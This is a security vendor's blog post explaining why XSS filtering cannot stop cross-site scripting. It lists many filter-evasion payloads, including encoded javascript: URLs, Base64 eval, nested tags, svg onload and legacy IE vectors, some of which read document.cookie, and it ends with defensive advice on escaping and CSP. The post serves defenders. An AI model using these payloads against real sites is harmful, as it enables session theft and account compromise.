XSS filter evasion: Why filtering doesn’t stop cross-site scripting

XSS filter evasion techniques allow attackers to get past cross-site scripting filters. This post lists some of the most common filter bypass methods, shows why filtering alone cannot be trusted to stop XSS attacks, and discusses recommended ways to prevent cross-site scripting.

XSS filter evasion: Why filtering doesn’t stop cross-site scripting

XSS filter evasion covers many hundreds of methods that attackers can use to bypass cross-site scripting (XSS) filters. A successful attack requires both an XSS vulnerability and a way to inject malicious JavaScript into web page code executed by the client to exploit that vulnerability. The idea of XSS filtering is to prevent attacks by finding and blocking (or stripping away) any code that looks like an XSS attempt. The problem is there are countless ways of bypassing such filters, so filtering alone can never fully prevent XSS. Before going into just a few of the thousands of known filter evasion methods, let‘s start with a quick look at the concept and history of XSS filtering.

What is XSS filtering and why is it so hard to do?

At the application level, XSS filtering means user input validation performed specifically to detect and prevent script injection attempts. Filtering can be done locally in the browser, during server-side processing, or by a web application firewall (WAF). For many years, server-side filtering was mostly used, but eventually browser vendors started building in their own filters called XSS auditors to prevent at least some cross-site scripting attempts from reaching the user.

The idea was that the filter scans code arriving at the browser and looks for typical signs of XSS payloads, such as suspicious <script> tags in unexpected places. Common approaches to filtering included complex regular expressions (regex) and code string blacklists. If potentially dangerous code was found, the auditor could block either the entire page or just the suspicious code fragment. Both reactions had their disadvantages and could even open up new vulnerabilities and attack vectors, which is why integrated browser filters soon went away.

All approaches to filtering have their limitations. XSS filtering by the browser is only effective against reflected XSS attacks, where the malicious code injected by the attacker is directly reflected in the client browser. Client-side filters and auditors are no use against XSS where the attack code is not parsed by the browser, including DOM-based XSS and stored XSS. Server-side and WAF-based filters can help against reflected and stored XSS but are helpless against DOM-based attacks since these happen entirely in the browser and the exploit code never arrives at the server. On top of that, trying to do XSS filtering in the web application itself is extremely complicated, can have unintended consequences, and requires constant maintenance to keep up with new exploits.

How attackers bypass cross-site scripting filters

At best, XSS filtering adds an extra level of difficulty to the work of attackers crafting XSS attacks, as any injected script code first has to get past the filters. While XSS attacks generally target application vulnerabilities and misconfigurations, XSS evasion techniques exploit gaps in the filtering performed by the browser, server, or WAF. 

There are numerous evasion approaches that can be combined to build countless bypasses. The common denominator is that they abuse product-specific implementations of web technology specifications. A large part of any browser’s codebase is devoted to gracefully handling malformed HTML, CSS, and JavaScript to try and fix code before presenting it to the user. XSS filter evasion techniques take advantage of this complex tangle of languages, specifications, exceptions, and browser-specific quirks to slip malicious code past the filters.

Examples of XSS filter bypasses

Filter evasion attempts can target any aspect of web code parsing and processing, so there are no rigid categories here and the list is always open. The most obvious script tag injections will generally be rejected out of hand, but there are many more sophisticated methods, and you can also use other HTML tags as injection vectors. Event handlers, in particular, are often used to trigger script loading, as they can be tied into legitimate user actions and are hard to just remove without breaking functionality. Commonly exploited handlers include onerror, onclick, and onfocus, but the majority of supported event handlers can be used as XSS vectors.

To give you some idea of the huge number of ways to bypass an XSS filter, the long list below is still only a tiny fraction of the tools available to attackers (see the OWASP Cheat Sheet for a scarily detailed list based on RSnake’s original cheat sheet). While this post is definitely not a complete reference, and most examples will only work in specific scenarios, anyone familiar with JavaScript should be aware that many such quirks exist alongside what you’d normally consider valid syntax.

Character encoding tricks

To bypass filters that rely on scanning text for specific suspicious strings, attackers have a variety of ways to encode one or many characters. Encodings can also be nested, so you’re encoding the same string many times, potentially using different methods. The choice of encoding is also dependent on the context, as browsers encode and decode characters differently in different places (for example, URL encoding is only supported for URL values in href tags). The following examples show just a few possibilities, and that’s without even resorting to Unicode tricks.

To bypass filters that directly search for a string like javascript:, some or all characters can be written as HTML entities using ASCII codes:

<a href="&
#106;avascript:alert('Successful XSS')">Click this link!</a>

To evade filters that look for HTML entity codes using a pattern of &# followed by a number, you can use ASCII codes but in hexadecimal encoding:

<a href="&
#x6A;avascript:alert(document.cookie)">Click this link!</a>

Base64 encoding can be used to obfuscate attack code. This example also displays an alert saying “Successful XSS”:

<body onload="eval(atob('YWxlcnQoJ1N1Y2Nlc3NmdWwgWFNTJyk='))">

All encoded character entities can be from 1 to 7 numeric characters, with any initial padding zeroes being ignored. This gives each entity in each encoding several extra zero-padded versions (OWASP’s XSS filter evasion cheat sheet lists no less than 70 valid ways of encoding just the < character). Also, note that semicolons are not actually required at the end of entities:

<a href="&
#x6A;avascript&#0000058&#0000097lert('Successful XSS')">Click this link!</a>

Character codes can be used to hide XSS payloads:

<iframe src=# onmouseover=alert(String.fromCharCode(88,83,83))></iframe>

Whitespace embedding

Browsers are very permissive when it comes to whitespace in HTML and JavaScript code, so embedded non-printing characters are another way to mess with filters. Note that most browsers no longer fall for such whitespace tricks, though they can still work in some contexts.

Tab characters are ignored when parsing code, so they can be used to break up keywords, as in this img tag (this one won’t work in a modern browser):

<img src="java	script:al	ert('Successful XSS')">

The tabs can also be encoded:

<img src="java&
#x09;script:al&
#x09;ert('Successful XSS')">

Just like tabs, newlines and carriage returns are also ignored and can be additionally encoded:

<a href="jav&
#x0A;ascript:&
#x0A;ale&
#x0D;rt('Successful XSS')">Visit google.com</a>

Some filters may look for "javascript: or 'javascript: and will not expect whitespace after the quote. In reality, any number of spaces and meta characters from 1 through 32 (decimal) will be valid:

<a href="  &#x8; &#23;   javascript:alert('Successful XSS')">Click this link!</a>

Tag manipulation

If the filter simply scans the code once and removes specific tags, such as <script>, nesting them inside other tags will leave valid code after they are removed:

<scr<script>ipt>document.write("Successful XSS")</scr<script>ipt>

Spaces between attributes can often be omitted. Also, a slash is a valid separator between the tag name and attribute name, which can be useful to evade whitespace limitations in inputs – note no whitespace in the entire string:

<img/src="funny.jpg"onload=javascript:eval(alert('Successful&#32XSS'))>

And another example without any whitespace, this time using the svg tag:

<svg/onload=alert('XSS')>

If parentheses or single quotes are disallowed, that’s not a problem—replacing them with backticks is still valid JavaScript:

<svg/onload=alert`xss`>

Evasion attempts can also exploit browser efforts to interpret and complete malformed tags. Here’s an example that omits the href attribute and quotes (most other event handlers can also be used): 

<a onmouseover=alert(document.cookie)>Go to google.com</a>

And an extreme example of a completely wrecked img tag that loads a script once repaired by the browser: 

<img """><script src=xssattempt.js></script>">

Extra fun with Internet Explorer

Before there was Chrome or Firefox (and definitely before Edge), there was almost exclusively Internet Explorer. Because of its many non-standard implementations and quirks related to other Microsoft technologies, IE provided some unique filter evasion vectors. And before you dismiss it as an outdated and marginal browser, remember that some legacy enterprise applications may continue to rely on IE-specific features.

The majority of XSS checks look for JavaScript, but Internet Explorer up to IE10 would also accept VBScript:

<a href='vbscript:MsgBox("Successful XSS")'>Click here</a>

Another unique IE feature are dynamic properties that allow script expressions as CSS values:

body { color: expression(alert('Successful XSS')); }

The rare and deprecated dynsrc attribute can provide another vector: 

<img dynsrc="javascript:alert('Successful XSS')">

Use backticks when you need both double and single quotes: 

<img src=`javascript:alert("The name is 'XSS'")`>

In older IE versions, you could also include a script disguised as an external style sheet: 

<link rel="stylesheet" href="http://example.com/xss.css">

Cabinet of curiosities: Legacy methods

Web technology specifications and implementations change so often that XSS filter bypasses naturally have a short shelf life. To end this article, here are some curiosities that shouldn’t work today but provide a glimpse into the many edge cases that can creep up when implementing new specs while also maintaining backward compatibility.

Injection into the background image attribute:

<body background="javascript:alert('Successful XSS')">

Same idea but using a style:

<div style="background-image:url(javascript:alert('Successful XSS'))">

Images without any img tags and with script code instead of the image file:

<input type="image" src="javascript:alert('Successful XSS')">

Script injected as the target URL for a meta tag redirect. In some older browsers, this would display an alert by evaluating the Base64-encoded JavaScript code:

<meta http-equiv="refresh" content="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

And as a final curiosity—did you know that, once upon a time, it was possible to hide an XSS payload using UTF-7 encoding?

<head><meta http-equiv="content-type" content="text/html; charset=utf-7"></head>
+adw-script+ad4-alert('xss');+adw-/script+ad4-

How can you protect your applications from cross-site scripting if not by filtering?

While web application firewalls can provide some XSS filtering, it’s worth keeping in mind that this is, at best, only one of many layers of protection. With hundreds of ways of evading filters and new vectors appearing all the time, filtering alone cannot prevent XSS. Combined with the potential for breaking valid scripts in complex modern applications, this is part of the reason why browser vendors are moving away from filtering.

By writing secure code that is not susceptible to XSS attacks, developers can have far more effect on application and user security than any filters. On the application level, this means treating all user-controlled inputs as untrusted by default and correctly applying context-sensitive escaping and encoding. On the HTTP protocol level, the main weapons against cross-site scripting are properly configured Content Security Policy (CSP) headers and other HTTP security headers.

With these best practices in place, you then also need to regularly test every site, app, and API to make sure that new code, updates, and configuration changes don’t result in exploitable XSS vulnerabilities. Running an enterprise-grade web vulnerability scanner that checks for vulnerabilities and security misconfigurations as part of a continuous process is thus an essential part of application security hygiene.

Zbigniew Banach

About the Author

Zbigniew Banach - Technical Content Lead & Managing Editor

Cybersecurity writer and blog managing editor at Invicti Security. Drawing on years of experience with security, software development, content creation, journalism, and technical translation, he does his best to bring web application security and cybersecurity in general to a wider audience.